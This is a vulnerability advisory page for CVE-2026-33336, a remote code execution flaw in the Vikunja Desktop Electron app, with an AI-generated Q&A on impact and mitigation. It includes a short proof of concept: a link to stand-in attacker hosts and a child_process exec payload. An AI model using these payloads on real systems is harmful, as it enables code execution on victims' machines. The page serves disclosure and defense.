CVE-2026-33336
Received Received - Intake
Node Integration RCE via Unsafe Navigation in Vikunja Desktop

Publication date: 2026-03-24

Last updated on: 2026-03-27

Assigner: GitHub, Inc.

Description
Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue. ## Root cause Two misconfigurations combine to create this vulnerability: 1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.). 2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by: - `<a href="https://...">` links (without `target="_blank"`) - `window.location` assignments - HTTP redirects - `<meta http-equiv="refresh">` tags ## Attack scenario 1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project). 2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>` 3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output. 4. The victim uses Vikunja Desktop and clicks the link. 5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process. 6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');` 7. Arbitrary commands execute as the victim's OS user. ## Impact Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient. ## Proof of concept 1. Set up a Vikunja instance with two users sharing a project. 2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>` 3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>` 4. As the victim, open the project in Vikunja Desktop and click the link. 5. calc.exe (or any other command) executes on the victim's machine. ## Credits This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-24
Last Modified
2026-03-27
Generated
2026-05-27
AI Q&A
2026-03-24
EPSS Evaluated
2026-05-25
NVD
CVE-2026-33336
EUVD
EUVD-2026-14911
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
vikunja vikunja From 0.21.0 (inc) to 2.2.2 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-94 The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-33336 is a critical remote code execution vulnerability in the Vikunja Desktop Electron application affecting versions from 0.21.0 up to but not including 2.2.0.

The vulnerability arises because the Electron BrowserWindow is configured with nodeIntegration enabled, which grants any loaded page full access to Node.js APIs such as require, child_process, and fs.

Additionally, there is no handler registered for same-window navigations (like clicking standard HTML links) which allows the BrowserWindow to navigate to attacker-controlled URLs without interception.

An attacker who is a legitimate user on the same Vikunja instance can embed a sanitized but malicious hyperlink in user-generated content (such as task or project descriptions). When a victim using Vikunja Desktop clicks this link, the BrowserWindow navigates to the attacker’s page where JavaScript executes with full Node.js access, enabling arbitrary code execution on the victim’s machine.


How can this vulnerability impact me? :

This vulnerability allows an attacker to execute arbitrary code on the victim’s desktop remotely.

  • The attacker can read and write arbitrary files on the victim’s machine.
  • The attacker can execute arbitrary commands with the victim’s OS user privileges.
  • Malware or backdoors can be installed by the attacker.
  • Sensitive data and credentials can be exfiltrated.

Importantly, no cross-site scripting (XSS) vulnerability is required; a sanitized hyperlink alone is sufficient to exploit this flaw.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

I don't know


What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation is to upgrade Vikunja Desktop to version 2.2.0 or later, where the vulnerability is patched.

This patch disables nodeIntegration in the BrowserWindow and adds handlers for same-window navigations to prevent attacker-controlled origins from executing arbitrary Node.js code.

Until upgrading, avoid clicking links in user-generated content within Vikunja Desktop, especially from untrusted users.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart